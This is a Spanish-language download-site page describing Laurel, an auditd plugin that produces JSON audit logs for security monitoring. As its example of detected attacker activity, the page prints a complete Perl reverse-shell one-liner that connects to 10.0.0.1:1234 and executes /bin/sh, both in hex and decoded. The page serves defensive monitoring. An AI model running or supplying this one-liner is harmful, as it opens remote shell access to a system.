Inicio>Relacionado con la programación>Otro código fuente
Descargar

Auditoría de Linux: usable, robusto, fácil de registro

Laurel es un complemento de postprocesamiento de eventos para Auditd (8) que genera registros de auditoría basados ​​en JSON útiles y útiles adecuados para configuraciones modernas de monitoreo de seguridad.

La documentación correspondiente a la última versión estable se puede encontrar aquí.

¿Por qué?

TLDR: En lugar de eventos de auditoría que se ven así ... 

 type=EXECVE msg=audit(1626611363.720:348501): argc=3 a0="perl" a1="-e" a2=75736520536F636B65743B24693D2231302E302E302E31223B24703D313233343B736F636B65742…

... Laurel los convierte en registros JSON donde el desastre que los atacantes/probadores de penetración/equipo rojo están tratando de hacer se vuelve evidente a primera vista: 

 { … "EXECVE":{ "argc": 3,"ARGV": ["perl", "-e", "use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};"]}, …}

Esto sucede en la fuente porque Laurel se ejecuta en el host donde se generan los eventos de auditoría. Los eventos se enriquecen con información útil sobre el proceso principal (PPID): 

 "PPID":{"EVENT_ID":"1643635026.276:327308","comm":"sh","exe":"/usr/bin/dash","ppid":3190631}

Documentación

La configuración y los detalles operativos se describen en la página manual de Laurel (8). Los detalles sobre el formato de registro y los fundamentos se pueden encontrar en la página manual de Laurel-About (7). La página Laurel-Audit-Rules (7) contiene consejos y ejemplos para configurar reglas de auditoría útiles para detectar las tácticas de los atacantes.

Las instrucciones de instalación de Laurel contienen instrucciones sobre cómo construir Laruel a partir de la fuente y cómo instalarlo y configurarlo.

Desarrollamos Laurel porque no estábamos contentos con conjuntos de características y características de rendimiento de proyectos y productos existentes. Consulte el documento de rendimiento para más detalles.

Ver también

  • Ansible-Auditd-Laurel, un papel ansible para implementar Auditd + Laurel , por @0xfustang / cert-eu

Licencia

Licencia pública general de GNU, versión 3

Autores

El logotipo fue creado por Birgit Meyer <[email protected]>.

Expandir
Información adicional
Aplicaciones relacionadas
Recomendado para ti
Información relacionada Todo